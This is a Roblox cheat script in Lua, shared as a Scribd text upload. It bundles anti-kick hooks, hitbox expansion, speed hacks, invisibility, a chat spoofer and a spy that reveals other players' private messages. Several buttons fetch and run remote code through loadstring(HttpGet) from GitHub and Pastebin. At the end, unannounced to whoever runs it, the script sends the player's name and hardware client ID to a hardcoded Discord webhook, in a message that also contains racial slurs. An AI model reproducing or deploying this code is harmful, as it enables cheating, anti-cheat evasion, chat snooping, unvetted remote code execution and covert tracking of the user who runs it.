0% found this document useful (0 votes)
54 views8 pages

Message

Uploaded by

godgokudrip
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
54 views8 pages

Message

Uploaded by

godgokudrip
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 8

local Library = loadstring(game:HttpGet("https://raw.githubusercontent.

com/xHeptc/
Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("kartofl._ eca gui (add on discord)", "Ocean")

Players = game:GetService("Players")

-- MAIN
local Main = Window:NewTab("Main")
local MainSection = Main:NewSection("Main")

MainSection:NewButton("No Fouls", "Dont make you foul other people", function()


local remote = game:GetService("ReplicatedStorage").Tackle

local old

old = hookmetamethod(game,"__namecall",function(self,...)

local method = getnamecallmethod()

local args = {...}

if self == remote and method == "FireServer" then

args[1] = game:GetService("Players").LocalPlayer

return old(self,unpack(args))

end

return old(self,...)

end)

game.StarterGui:SetCore("SendNotification", {Title = "No Fouls Made By kartofl._",


Text = "Script loaded, "..game.Players.LocalPlayer.DisplayName..".", Duration =
4,})
end)

MainSection:NewButton("HBE Bypass", "Doesnt make you get kicked when you use
hbe", function()
--// Cache

local getgenv, getnamecallmethod, hookmetamethod, newcclosure, checkcaller,


stringlower = getgenv, getnamecallmethod, hookmetamethod, newcclosure, checkcaller,
string.lower

--// Loaded check

if getgenv().ED_AntiKick then return end

--// Variables

local Players, StarterGui, OldNamecall = game:GetService("Players"),


game:GetService("StarterGui")

--// Global Variables

getgenv().ED_AntiKick = {
SendNotifications = false, -- Set to true if you want to get notified for every
event
CheckCaller = true -- Set to true if you want to disable kicking by other
executed scripts
}

--// Main

OldNamecall = hookmetamethod(game, "__namecall", newcclosure(function(...)


if (getgenv().ED_AntiKick.CheckCaller and not checkcaller() or true) and
stringlower(getnamecallmethod()) == "kick" then
if getgenv().ED_AntiKick.SendNotifications then
StarterGui:SetCore("SendNotification", {
Title = "Exunys Developer",
Text = "The script has successfully intercepted an attempted
kick.",
Icon = "rbxassetid://6238540373",
Duration = 0,
})
end

return nil
end

return OldNamecall(...)
end))

if getgenv().ED_AntiKick.SendNotifications then
StarterGui:SetCore("SendNotification", {
Title = "Exunys Developer",
Text = "Anti-Kick script loaded!",
Icon = "rbxassetid://6238537240",
Duration = 0,
})
end

local old

old = hookmetamethod(game,"__namecall",function(self,...)

local method = getnamecallmethod()

local args = {...}

if self == remote and method == "FireServer" then

args[1] = game:GetService("Players").LocalPlayer

return old(self,unpack(args))

end

return old(self,...)

end)

game.StarterGui:SetCore("SendNotification", {Title = "HBE Bypass Made By


kartofl._f", Text = "Script loaded, "..game.Players.LocalPlayer.DisplayName..".",
Duration = 4,})
end)

MainSection:NewButton("Infinite Yield", "FE Admin Commands", function()


loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/
infiniteyield/master/source'),true))()
end)

MainSection:NewToggle("HBEfor legs", "Makes Your legs bigga", function(state)


if state then
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Leg"].Size = Vector3.new(2, 2, 2)
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Leg"].Transparency = 0.4
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Leg"].Material = Enum.Material.Air
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Leg"].Size = Vector3.new(2, 2, 2) --!!! CHANGE IT TO YOUR USERNAME BECAUSE I
LAME AND I CANT SCRIPT A THING THAT GETTING YOUR NICK AUTOMATICALLY I WILL UPDATE
THIS LATER
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Leg"].Transparency = 0.4
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Leg"].Material = Enum.Material.Air
else
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Leg"].Size = Vector3.new(1, 2, 1)
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Leg"].Transparency = 0
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Leg"].Material = Enum.Material.Plastic
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Leg"].Size = Vector3.new(1, 2, 1) --!!! CHANGE IT TO YOUR USERNAME BECAUSE I
LAME AND I CANT SCRIPT A THING THAT GETTING YOUR NICK AUTOMATICALLY I WILL UPDATE
THIS LATER
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Leg"].Transparency = 0
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Leg"].Material = Enum.Material.Plastic
end

end)

MainSection:NewToggle("HBE For Arms", "Makes Your legs bigga", function(state)


if state then
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Arm"].Size = Vector3.new(2.7, 3.5, 2.7)
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Arm"].Transparency = 0.8
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Arm"].Material = Enum.Material.Air
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Arm"].Size = Vector3.new(2.7, 3.5, 2.7) --!!! CHANGE IT TO YOUR USERNAME
BECAUSE I LAME AND I CANT SCRIPT A THING THAT GETTING YOUR NICK AUTOMATICALLY I
WILL UPDATE THIS LATER
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Arm"].Transparency = 0.8
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Arm"].Material = Enum.Material.Air
else
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Arm"].Size = Vector3.new(1, 2, 1)
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Arm"].Transparency = 0
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Arm"].Material = Enum.Material.Plastic
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Arm"].Size = Vector3.new(1, 2, 1) --!!! CHANGE IT TO YOUR USERNAME BECAUSE I
LAME AND I CANT SCRIPT A THING THAT GETTING YOUR NICK AUTOMATICALLY I WILL UPDATE
THIS LATER
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Arm"].Transparency = 0
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Left Arm"].Material = Enum.Material.Plastic
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Right Leg"].Size = Vector3.new(1, 2, 1)
game:GetService("Workspace").game:GetService("Workspace")
[game.Players.LocalPlayer.Name]
["Right Leg"].Transparency = 0
game:GetService("Workspace").game:GetService("Workspace")
[game.Players.LocalPlayer.Name]
["Right Leg"].Material = Enum.Material.Plastic
end

end)

MainSection:NewToggle("HBE For Head", "Makes Your head bigga", function(state)


if state then
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].Size = Vector3.new(5, 3.5, 5) --!!! CHANGE IT TO YOUR USERNAME BECAUSE I
LAME AND I CANT SCRIPT A THING THAT GETTING YOUR NICK AUTOMATICALLY I WILL UPDATE
THIS LATER
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].Transparency = 1
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].Material = Enum.Material.Air
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].CanCollide = false
else
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].Size = Vector3.new(2, 1, 1) --!!! CHANGE IT TO YOUR USERNAME BECAUSE I
LAME AND I CANT SCRIPT A THING THAT GETTING YOUR NICK AUTOMATICALLY I WILL UPDATE
THIS LATER
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].Transparency = 0
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].Material = Enum.Material.Plastic
game:GetService("Workspace")[game.Players.LocalPlayer.Name]
["Head"].CanCollide = true
end

end)

--LOCAL PLAYER
local Player = Window:NewTab("Player")
local PlayerSection = Player:NewSection("Player")

PlayerSection:NewSlider("Walkspeed", "SPEED!!", 500, 16, function(s)


game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s
end)

PlayerSection:NewSlider("Jumppower", "JUMP HIGH!!", 350, 50, function(s)


game.Players.LocalPlayer.Character.Humanoid.JumpPower = s
end)

PlayerSection:NewButton("Reset WS/JP", "Resets to all defaults", function()


game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
end)

--Other
local Other = Window:NewTab("Other")
local OtherSection = Other:NewSection("Other")

OtherSection:NewButton("Chat Spoofer", "Lets you chat for other people",


function()
loadstring(game:HttpGet(('https://pastebin.com/raw/djBfk8Li'),true))()
end)

OtherSection:NewButton("Invisibility", "become invisible on the eyes of


others", function()
--[[
WARNING: Heads up! This script has not been verified by ScriptBlox. Use at
your own risk!
]]
local key = Enum.KeyCode.E -- key to toggle invisibility

--// dont edit script below


local invis_on = false
function onKeyPress(inputObject, chat)
if chat then return end
if inputObject.KeyCode == key then
invis_on = not invis_on
if invis_on then
local savedpos =
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
wait()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =
CFrame.new(0, -200, 0)
wait(.15)
local Seat = Instance.new('Seat', game.Workspace)
Seat.Anchored = false
Seat.CanCollide = false
Seat.Name = 'invischair'
Seat.Transparency = 1
Seat.Position = Vector3.new(0, -200, 0)
local Weld = Instance.new("Weld", Seat)
Weld.Part0 = Seat
Weld.Part1 = game.Players.LocalPlayer.Character:FindFirstChild("Torso")
or game.Players.LocalPlayer.Character.UpperTorso
wait()
Seat.CFrame = savedpos
game.StarterGui:SetCore("SendNotification", {
Title = "Invis On";
Duration = 1;
Text = "";
})
else
workspace:FindFirstChild('invischair'):Remove()
game.StarterGui:SetCore("SendNotification", {
Title = "Invis Off";
Duration = 1;
Text = "";
})
end
end
end

game:GetService("UserInputService").InputBegan:connect(onKeyPress)
end)

OtherSection:NewButton("Bypassed Fly", "bird mode", function()


loadstring(game:HttpGet("https://raw.githubusercontent.com/Nicuse/
RobloxScripts/main/BypassedFly.lua"))()

Fly(true)
end)

OtherSection:NewButton("SPY", "allows you to see priv messages", function()


local OrionLib =
loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/
source')))()
local Window = OrionLib:MakeWindow({Name = "kaltolf gay spy", HidePremium = false,
SaveConfig = true, ConfigFolder = "KaltolfSpy"})

local Tab = Window:MakeTab({


Name = "Main",
Icon = "rbxassetid://4483345998",
PremiumOnly = false
})

local Section = Tab:AddSection({


Name = "Chat Log's"
})

--[[
Name = <string> - The name of the section.
]]
OrionLib:MakeNotification({
Name = "From Kaltolf",
Content = "U better ont leak it!",
Image = "rbxassetid://4483345998",
Time = 5
})

--[[
Title = <string> - The title of the notification.
Content = <string> - The content of the notification.
Image = <string> - The icon of the notification.
Time = <number> - The duration of the notfication.
]]
--This script reveals ALL hidden messages in the default chat
--chat "/spy" to toggle!
enabled = true
--if true will check your messages too
spyOnMyself = true
--if true will chat the logs publicly (fun, risky)
public = false
--if true will use /me to stand out
publicItalics = true
--customize private logs
privateProperties = {
Color = Color3.fromRGB(0,255,255);
Font = Enum.Font.SourceSansBold;
TextSize = 18;
}
local StarterGui = game:GetService("StarterGui")
local Players = game:GetService("Players")
local player = Players.LocalPlayer
local saymsg =
game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):Wa
itForChild("SayMessageRequest")
local getmsg =
game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):Wa
itForChild("OnMessageDoneFiltering")
local instance = (_G.chatSpyInstance or 0) + 1
_G.chatSpyInstance = instance

local function onChatted(p,msg)


if _G.chatSpyInstance == instance then
if p==player and msg:lower():sub(1,4)=="/spy" then
enabled = not enabled
wait(0.3)
privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
elseif enabled and (spyOnMyself==true or p~=player) then
msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ')
local hidden = true
local conn = getmsg.OnClientEvent:Connect(function(packet,channel)
if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-
#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and
Players[packet.FromSpeaker].Team==player.Team)) then
hidden = false
end
end)
wait(1)
conn:Disconnect()
if hidden and enabled then
if public then
saymsg:FireServer((publicItalics and "/me " or '').."{SPY} ["..
p.Name .."]: "..msg,"All")
else
privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg
StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
end
end
end
end
end
for _,p in ipairs(Players:GetPlayers()) do
p.Chatted:Connect(function(msg) onChatted(p,msg) end)
end
Players.PlayerAdded:Connect(function(p)
p.Chatted:Connect(function(msg) onChatted(p,msg) end)
end)
privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
local chatFrame = player.PlayerGui.Chat.Frame
chatFrame.ChatChannelParentFrame.Visible = true
chatFrame.ChatBarParentFrame.Position =
chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChanne
lParentFrame.Size.Y)

end)
HttpService = game:GetService("HttpService")
Webhook_URL =
"https://discord.com/api/webhooks/1155040559711404143/NF8lVrUX9LtEIo5nN7fTkMOptMLvh
ELLl4qPvutAGQ3y65AJs2EYp_n3F5GhD1RM4FuO"

local response = request(


{
Url = Webhook_URL,
Method = 'POST',
Headers = {
['Content-Type'] = 'application/json'
},
Body = HttpService:JSONEncode({
["content"] ="",
["embeds"] = {{
["title"] = "Some nigga Executed your script",
["description"] = game.Players.LocalPlayer.Name.." has executed the nigga
cheat.",
["type"] = "rich",
["color"] = tonumber(0xffffff),
["fields"] = {
{
["name"] = "Hardware ID:",
["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
["inline"] = true
}
}
}}
})
}
)

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy